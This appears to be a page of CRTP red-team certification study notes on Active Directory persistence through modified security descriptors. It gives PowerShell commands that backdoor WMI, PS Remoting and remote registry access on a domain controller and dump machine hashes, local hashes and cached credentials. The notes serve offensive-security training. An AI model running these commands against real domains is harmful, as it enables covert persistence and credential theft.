🛠️
CRTP Notes
  • 🛠️CRTP Notes
  • ⚙️CRTP Methodology
  • 💡Misc
    • PowerShell Basics
    • Bypass defenses
    • Transfer files
  • 🔨Basic enumeration
    • General
    • Network
    • Protection
  • ⛏️AD Enumeration
    • Gnereral
    • ACL
    • Forests and Trusts
  • 🔪Privilege Escalation
    • Local Privilege Escalation
    • Domain Privilege Escalation
      • Kerberoast
      • AS-REP Roasting
      • Delegations
    • Cross Domain Privilege Escalation
      • Trusts
      • AD CS
      • MSSQL Servers
  • 🏎️Lateral Movement
    • WinRM
    • Credentials Dumping
    • DC Sync
    • Over Pass The Hash
    • Runas
  • 🔧Persistence
    • Kerberos
      • Golden Ticket
      • Silver Ticket
      • Diamond Ticket
    • Skeleton Key
    • DSRM
    • Custom SSP
    • AdminSDHolder
    • Security Descriptors
    • ACL
  • 🛡️Mitigations
  • 📚Resources
    • AD attacking overall
    • Rubeus Guide
    • The Hacker Recipes
Powered by GitBook
On this page
  • Format
  • Exploitation
  • WMI - GUI
  • WMI - PowerShell
  • Remote Registry

Was this helpful?

  1. Persistence

Security Descriptors

Last updated 7 months ago

Was this helpful?

Format

Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor.

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

Detailed docs about SDDL:

Exploitation

Once we have administrator privileges it is possible to create a backdoor by modifying Security Descriptors like Owner, primary group, DACL and SACL of multiple remote access methods to allow access to non-admin users.

WMI - GUI

It is possible to add the non-admin user to the ACE using the Component Services and Computer Management.

Apply to all namespaces

# Check if worked
# Worked if didn't get access denied 
gwmi -class win32_operatingsystem -ComputerName <dc_machine>

WMI - PowerShell

ACE for built-in administrators for WMI namespaces A;CI;CCDCLCSWRPWPRCWD;;;SID

in order to get access to WMI namespaces attacker needs to create a new ACE with the SID to non-admin user which he controls.

Require Domain Admin privileges

# Loading the module
. C:\AD\Tools\RACE-master\RACE.ps1




Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# with explicit credentials
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

# Remove
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc-namespace 'root\cimv2' -Remove -Verbose

PS Remoting (not stable after August 2020 patches)

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose

# Remove
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove

Remote Registry

# Modify ACE with admin privs
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# retrieve machine hash
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# retrieve local account hash
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# retrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

ACLs can be modified to allow non-admin users using the :

Reg backdoor using Tool allows to non-admin user to retrieve the hash of the computer, the SAM and cached credentials in the computer:

🔧
RACE toolkit
DAMP
ACE Strings - Win32 appsMicrosoftLearn
Logo
Component Services
Computer Management
Computer Management